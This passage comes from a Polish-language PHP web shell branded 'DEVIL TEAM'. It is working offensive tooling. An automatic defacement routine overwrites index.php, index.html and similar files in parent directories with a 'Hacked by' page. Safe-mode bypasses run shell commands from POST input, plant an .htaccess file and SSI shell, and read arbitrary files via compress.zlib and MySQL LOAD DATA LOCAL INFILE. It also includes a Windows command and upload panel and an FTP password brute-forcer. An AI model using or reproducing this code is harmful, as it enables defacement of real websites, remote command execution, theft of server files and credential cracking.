'BhbGlnbj0iY2VudGVyIiBjbGFzcz0icm93MyI+JnF1b3Q7SmVkeW55bSBzcG9zb2JlbSBieSBzdGFh'. 'IHNpZSBzcHJ5dG5pZWpzenltLCBqZXN0IGdyYSB6ZSBzcHJ5dG5pZWpzenltIHByemVjaXduaWtpZW'. '0mcXVvdDsgLSBQb2RzdGF3eSBncnkgdyBzemFjaHkgMTg4M3IuPC9wPg0KICA8cCBhbGlnbj0iY2Vu'. 'dGVyIiBjbGFzcz0icm93MyI+JnF1b3Q7TmllIG1vP25hIHVuaWtuYWEgd29qbnkuIE1vP25hIGplZH'. 'luaWUgb3Dzem5pYSBqYSBuYSBrb3J6eXNhIHByemVjaXduaWthJnF1b3Q7IC0gTmljY29sbyBNYWNo'. 'aWF2ZWxsaSAxNTAyci4gPC9wPg0KICA8cCBhbGlnbj0iY2VudGVyIiBjbGFzcz0icm93MyI+JnF1b3'. 'Q7TmllIG1hIGN6ZWdvJiMzNDc7IHRha2llZ28gamFrIGRvYnJvIGkgeiYjMzIyO28uIFMmIzI2MTsg'. 'dHlsa28gdyYjMzIyO2FkemEgaSBwb3QmIzI4MTtnYS4gSSBtbiZvYWN1dGU7c3R3byBsdWR6aSB6Yn'. 'l0IHMmIzMyMjthYnljaCwgYnkgb3NpJiMyNjE7Z24mIzI2MTsmIzI2MzsgdyYjMzIyO2FkeiYjMjgx'. 'OyBpIHBvdCYjMjgxO2cmIzI4MTsuLi4mcXVvdDsgLSBUb20gTWFydm9sbyBSaWRkbGU8L3A+DQogID'. 'wvZGl2Pg=='); } //koniec info //autodeface if ($action=="autodeface") { echo base64_decode('PGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZS'. 'IgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTIiPg0KPHRp'. 'dGxlPg0KQXV0b0RlZmFjZSBieSBLYWNwZXIgISAjIERFVklMIFRFQU0gOiBodH'. 'RwOi8vd3d3LnJhaGltLndlYmQucGwvDQo8L3RpdGxlPg0KPC9oZWFkPg0KPGNl'. 'bnRlcj4NCjxzbWFsbD4NCjxwIGFsaWduPSJjZW50ZXIiPlBvZG1pZW5pYWN6IH'. 'BsaWvzdyBuYSBzZXJ3ZXJ6ZSA6KSA8L3A+DQo8cCBhbGlnbj0iY2VudGVyIj5V'. 'JiMzODA7eXdhc3ogc2tyeXB0dSBuYSB3JiMzMjI7YXNuJiMyNjE7IG9kcG93aW'. 'VkemlhbG5vJiMzNDc7JiMyNjM7PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+QXV0'. 'b3I6IDxhIGhyZWY9Imh0dHA6Ly93d3cucmFoaW0ud2ViZC5wbC8iIHRhcmdldD'. '0iX2JsYW5rIj5LYWNwZXI8L2E+PC9wPg0KPGJyPg0KPC9zbWFsbD4NCjwvY2Vu'. 'dGVyPg0KPGhyIHNpemU9MSBub3NoYWRlPg=='); echo base64_decode("PGZvcm0gYWN0aW9uPSc/YXV0b2RlZmFjZT0xJyBtZXRob2". "Q9J1BPU1QnPg0KPGRpdiBhbGlnbj0nY2VudGVyJz5Lb2Qg". "a3Qmb2FjdXRlO3J5IG1hIHphc3QmIzI2MTtwaSYjMjYzOy". "BwbGlraSB0eXB1IGluZGV4LiogPC9kaXY+DQo8cCBhbGln". "bj0nY2VudGVyJz4NCjx0ZXh0YXJlYSBuYW1lPSdvd25lZC". "cgY29scz0nNTAnIHJvd3M9JzEwJz48dGl0bGU+SGFja2Vk". "IGJ5IERFVklMIFRFQU08L3RpdGxlPg0KPHN0eWxlIHR5cG". "U9J3RleHQvY3NzJz4NCjwhLS0NCi5zdHlsZTEgew0KCWZv". "bnQtc2l6ZTogMzZweDsNCglmb250LXdlaWdodDogYm9sZD". "sNCn0NCi0tPg0KPC9zdHlsZT4NCjxwIGFsaWduPSdjZW50". "ZXInIGNsYXNzPSdzdHlsZTEnPkhhY2tlZCBieSA8YSBocm". "VmPSdodHRwOi8vd3d3LnJhaGltLndlYmQucGwvJz5ERVZJ". "TCBURUFNIDwvYT48cD48L3A+DQo8L3RleHRhcmVhPg0KPC". "9wPg0KPHAgYWxpZ249J2NlbnRlcic+DQo8aW5wdXQgdHlw". "ZT0nc3VibWl0JyB2YWx1ZT0nQXV0b0RlZmFjZSEnPg0KPC". "9wPg=="); if (isset($autodeface)) { $lokacja= array ( "index.php", "../index.php", "../../index.php", "../../../index.php", "../../../../index.php", "../../../../../index.php", "../../../../../../index.php", "../../../../../../../index.php", "index.php3", "../index.php3", "../../index.php3", "../../../index.php3", "../../../../index.php3", "../../../../../index.php3", "../../../../../../index.php3", "../../../../../../../index.php3", "index.php4", "../index.php4", "../../index.php4", "../../../index.php4", "../../../../index.php4", "../../../../../index.php4", "../../../../../../index.php4", "../../../../../../../index.php4", "index.html", "../index.html", "../../index.html", "../../../index.html", "../../../../index.html", "../../../../../index.html", "../../../../../../index.html", "../../../../../../../index.html", "index.htm", "../index.htm", "../../index.htm", "../../../index.htm", "../../../../index.htm", "../../../../../index.htm", "../../../../../../index.htm", "../../../../../../../index.htm", "index.shtml", "../index.shtml", "../../index.shtml", "../../../index.shtml", "../../../../index.shtml", "../../../../../index.shtml", "../../../../../../index.shtml", "../../../../../../../index.shtml", "index.asp", "../index.asp", "../../index.asp", "../../../index.asp", "../../../../index.asp", "../../../../../index.asp", "../../../../../../index.asp", "../../../../../../../index.asp", "index.cgi", "start.html" ); for ($i=0; $i<=count($lokacja)-1; $i++) { $suma=$i+1; if (file_exists($lokacja[$i])) { $fp=fopen($lokacja[$i], "w"); fputs($fp, $owned); fclose($fp); echo"
Podmieniony plik [".$suma."] $lokacja[$i] !
"; } else { echo "
Plik [".$suma."] $lokacja[$i] nie istnieje

"; } } } echo base64_decode("PGhyIHNpemU9MSBub3NoYWRlPg0KPGNlbnRlcj4NCjxzbWFsbD4NCkNvc". "HlyaWdodCAmY29weTsgMjAwNyA8YSBocmVmPSdodHRwOi8vd3d3LnJhaG". "ltLndlYmQucGwvJz5ERVZJTCBURUFNPC9hPg0KLCB3c3plbGtpZSBwcmF". "3YSB6YXN0cnplJiMzODA7b25lDQo8YnI+DQo8L3NtYWxsPg0KPC9jZW50". "ZXI+DQo8L2h0bWw+"); } //koniec autodeface //safe mode breaker if ($action=="safemodebreak") { print '

Wybierz typ ataku:

Safe Mode Command Execution Bypass

Safe Mode Command Execution Bypass #2 (.shtml)

Safe Mode Bypass PHP 4.4.2 i PHP 5.1.2

Safe Mode Bypass Mysql

'; if ($actionsafe=="safe_mode_01"){ echo "Safe Mode Command Execution Bypass
"; print_r('
Komenda :
Czytaj: '); ini_restore("safe_mode"); ini_restore("open_basedir"); $safe_exec_01=shell_exec($_POST[baba]); $safe_exec_02=shell_exec($_POST[liz0]); echo "
";
echo $safe_exec_01;
echo $safe_exec_02;
echo "
"; } if ($actionsafe=="safe_mode_02"){ $fp=fopen(".htaccess", "w") or die("Nie masz dostepu do pliku .htaccess! Sprawdz chmody!"); fputs($fp, "AddType text/html .shtml AddHandler server-parsed .shtml Options +Includes"); fclose($fp); echo "Plik .htaccess stworzony!
\n"; $fp=fopen("shell.shtml", "w") or die("Nie masz dostepu do pliku shell.shtml! Sprawdz chmody!"); fputs($fp, ' '); fclose($fp); echo "Plik shell.shtml stworzony!\r\n"; print '   '; } if ($actionsafe=="safe_mode_03"){ print '

'; $tymczas="./"; if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "ON (Zabezpieczony)"; } else {$safemode = false; $hsafemode = "OFF (Niezabezpieczony)";} echo("Safe-mode: $hsafemode"); $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} else {$openbasedir = false; $hopenbasedir = "OFF (Niezabezpieczony)";} echo("
"); echo("Open base dir: $hopenbasedir"); echo("
"); echo "Zablokowanych funkcji: "; if(''==($df=@ini_get('disable_functions'))){echo "0";}else{echo "$df
";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); echo "
\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nElo.. skrypt pozwala na czytanie plików po mimo safe mode = on\n ");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "--- Start File ".htmlspecialchars($file)."
-------------\n".htmlspecialchars($tekst)."\n--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\nPlik
".htmlspecialchars($file)." zostal juz odczytany.");
} else {
die("
Sorry... Plik
".htmlspecialchars($file)." nie istnieje albo nie masz dostepu!.
");
}
}
if ($actionsafe=="safe_mode_04"){
echo "

  

  
    
SQL Server: 
      
      Port: 
      
Tabela: 
      
      

      Użytkownik:
      
      Haslo: 
      
Pokaż plik:





    

  


";
if ($_POST['odpal_to_gowno']=="hauru_mysql")
 {
  if(empty($_POST['adres'])) { $_POST['adres'] = "localhost"; }
  if(empty($_POST['port_hauru'])) { $_POST['port_hauru'] = "3306"; }
  $db = @mysql_connect($_POST['adres'].':'.$_POST['port_hauru'],$_POST['uzytkownik_mysql_hauru'],$_POST['haslo_mysql_hauru']);
  if($db)
   {
   if(@mysql_select_db($_POST['tabela_mysql_hauru'],$db))
    {
     @mysql_query("DROP TABLE IF EXISTS hauru");
     @mysql_query("CREATE TABLE `hauru` ( `file` LONGBLOB NOT NULL )");
     @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['pokaz_plik_mysql_hauru'])."\" INTO TABLE hauru FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
     $r = @mysql_query("SELECT * FROM hauru");
     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
     @mysql_query("DROP TABLE IF EXISTS hauru");
    }
    else echo "
[-] Nie można odnale?ć bazy!

";
   @mysql_close($db);
   }
  else echo "
[-] Nie można się połšczyć z bazš!

";
 }
}
}
//safe mode breaker koniec
if ($action=="winhack")
{
set_magic_quotes_runtime(0);
$wer = `ver`;
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$windir = `echo %windir%`;
   if( $cmd == "" ) {
    $cmd = 'dir /OG /X';
  }
print "";
print "";
print "" ;
print "" ;
print "";
print "";
print "" ;
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "
Ty: ".$_SERVER['REMOTE_ADDR']." [".$host."] 
Wersja OS: $wer 
Serwer:".$_SERVER['SERVER_SIGNATURE']."
Win Dir: $windir 
";
print "
";
print "Komendy !!";
print "
";
print "";
print "   ";
print "";
print "   ";
print "";
print "   ";
print "";
print "
";
print "";
print "
";
print "
";
print "CMD: ";
print "
";
print "";
print " ";
print "
";
print "
";
print "Upload Plików:";
print "
";
print "";
print "Plik: 
";
print "Nazwa pliku na serwerze:  
";
print" ";
print"
";
 if (is_uploaded_file($userfile)) {
move_uploaded_file($userfile, $serverfile);
}
}
if ($action=="ftpbrute")
{
$host = $_POST["host"];
$user = $_POST["user"];
$dict = $_POST["dict"];
if (!isset($ftpbrute)) 
{
echo "
"; 
echo "Host: 
"; 
echo "User: 
";
echo "Wordlist: 
";
echo "";
echo "
";
}else{
$file = fopen ($dict, "r");
while (!feof ($file)) {
$pass[$i] = fgets($file, 1024);
$i++;
} fclose($file);
$limit = count($pass);
$width2 = $limit;
echo "[o] Wgrano ".$limit." hasel. 
";
echo "[o] Postep: 
";
echo "\"".$width2."\"
";
for ($i=0; $i<$limit; $i++){
$ftp = ftp_connect($host, 21);
if(ftp_login($ftp, $user, $pass[$i])){
echo "
[o] Udalo sie!
[o] Login: ".$user."
[o] Haslo:".$pass[$i]."
";
}else{
$width = 1;
echo "\"".$width."\"";
}}
ftp_close($ftp);
echo "
Gotowe.";
}
}
if ($action=="defined_vars")
{
echo "


  
    
";
echo "
";
}
?>


  

    <? Copyright by DEVIL TEAM 2006r. ?>
  

Strona wygenerowana w '.$end.' sekund(y) !
';
?>